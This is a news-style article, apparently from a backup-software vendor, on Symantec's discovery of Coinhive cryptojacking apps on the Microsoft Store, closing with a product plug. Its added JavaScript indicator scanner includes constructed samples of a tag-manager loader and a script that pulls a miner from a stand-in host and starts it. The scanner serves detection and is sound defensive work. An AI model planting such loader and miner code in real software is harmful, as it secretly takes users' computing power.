In January 2019, security researchers from Symantec found cryptojacking apps on the Microsoft Store that had been published between April and December 2018. These applications mine Monero without the owner’s consent or knowledge. Read this post to learn more about these apps.

Symantec Finds Cryptojacking Apps

On February 15, 2019, the cybersecurity company Symantec published a blog post on its website describing its discovery of several potentially unwanted applications (PUAs) on the Microsoft Store that used the victim’s CPU power to mine cryptocurrency.

The eight apps were Fast-search Lite, Clean Master+ (Tutorials), Battery Optimizer (Tutorials), FastTube, VPN Browsers+, Findoo Browser 2019, Downloader for YouTube Videos, and Findoo Mobile & Desktop Search.

Users could come across these apps through the top apps lists on the Microsoft Store or via keyword search. Symantec found that they could run on Windows 10, as well as in Windows 10 S Mode.

The firm had found these apps on January 17 and reported them to Microsoft. Although Microsoft didn’t respond to the company directly, it subsequently removed them from the Store.

According to Symantec, these applications were published between April and December 2018, and a majority of them were published towards the end of the year. Although the apps were on the Microsoft Store for a relatively short period of time, a number of users may have downloaded them.

The exact download and installation counts aren’t known, but the apps had almost 1,900 user ratings, which means at least thousands of devices may have been infected.

How Cryptojacking Apps on Microsoft Store Work

In its blog post, Symantec explained how these apps worked. As soon as users downloaded and launched the apps, the apps fetched a coin-mining JavaScript library by triggering Google Tag Manager in their domain servers. The mining script was then activated and started using the majority of the PC’s CPU cycles to mine Monero for the operators.

Symantec reportedly told Microsoft and Google about the behavior of these applications. Microsoft removed the apps from the Store, and Google removed the mining JavaScript from Google Tag Manager.

All of these apps provided privacy policies, but their descriptions on the app store made no mention of coin mining. According to Symantec’s analysis, the mining malware embedded in these applications was the web browser-based Coinhive mining code.
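Because the app only triggers Google Tag Manager and the Coinhive script arrives at runtime, a scan of the packaged files alone may show a tag loader and no miner. The following added example (not code from Symantec or from the apps) scans both stages for indicators; the file names, container ID, URL and site key are constructed placeholders, and it assumes the package itself carried only the loader.

```javascript
// Added example: static indicators for a tag-manager-delivered Coinhive miner.
// All sample content below is constructed; none of it comes from the real apps.
const RULES = [
  { id: "gtm-loader", kind: "remote-loader", re: /googletagmanager\.com\/gtm\.js/g },
  { id: "gtm-container", kind: "remote-loader", re: /\bGTM-[A-Z0-9]{4,}\b/g },
  { id: "coinhive-lib", kind: "miner", re: /coinhive(\.min)?\.js/gi },
  { id: "coinhive-api", kind: "miner", re: /CoinHive\.(Anonymous|User|Token)\s*\(/g },
];

// Scan a { name: text } map and return one finding per rule match.
function scan(sources) {
  const findings = [];
  for (const [source, text] of Object.entries(sources)) {
    for (const rule of RULES) {
      for (const m of text.matchAll(rule.re)) {
        findings.push({ source, rule: rule.id, kind: rule.kind, match: m[0] });
      }
    }
  }
  return findings;
}

// A remote loader alone is not proof of mining, but it means the code that
// actually runs is decided server-side and must be reviewed at runtime.
function verdict(findings) {
  if (findings.some((f) => f.kind === "miner")) return "miner-present";
  if (findings.some((f) => f.kind === "remote-loader")) return "needs-runtime-review";
  return "clean";
}

// Stage 1 (constructed): web content shipped inside the app package.
const packaged = {
  "index.html": `<script>(function(w,d,s,l,i){var j=d.createElement(s);
    j.src='https://www.googletagmanager.com/gtm.js?id='+i;d.head.appendChild(j);
  })(window,document,'script','dataLayer','GTM-EXAMPLE1');</script>`,
};

// Stage 2 (constructed): script body captured from the network at runtime.
const captured = {
  "gtm-response.js": `var s=document.createElement('script');
    s.src='https://miner.example.invalid/lib/coinhive.min.js';
    var m=new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER');`,
};

console.log("package :", verdict(scan(packaged)));
console.log("captured:", verdict(scan(captured)));
```

The "needs-runtime-review" verdict is the useful one for triage: it marks content whose behaviour cannot be judged from the package and should be checked against proxy or browser network captures.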

These apps fall into the categories of internet search, video viewing and downloading, web browsers, and computer and battery optimization tutorials. They came from three developers: 1clean, Findoo and DigiDream. After further investigation, Symantec found that these apps had been developed by the same person or group, despite the different names.

How to Protect PC from Online Threats

In its blog post on the cryptojacking apps on the Microsoft Store, Symantec also offered some suggestions on how to protect a computer from online threats and risks. The precautions are as follows.


  1. Keep software up-to-date.
  2. Only install apps from trusted websites and don’t download them from unfamiliar sites.
  3. Pay close attention to the CPU and memory usage of the computer or device.
  4. Pay attention to the permissions requested by apps.
  5. Install a suitable antivirus program, such as Norton, on the PC to protect it.
  6. Above all, the most important thing is to make regular backups for important
Tip: To protect the PC from data loss or system issues caused by virus attacks, disk failure, mistaken operations and more, a PC backup is necessary. Here, the professional Windows backup software MiniTool ShadowMaker is highly recommended.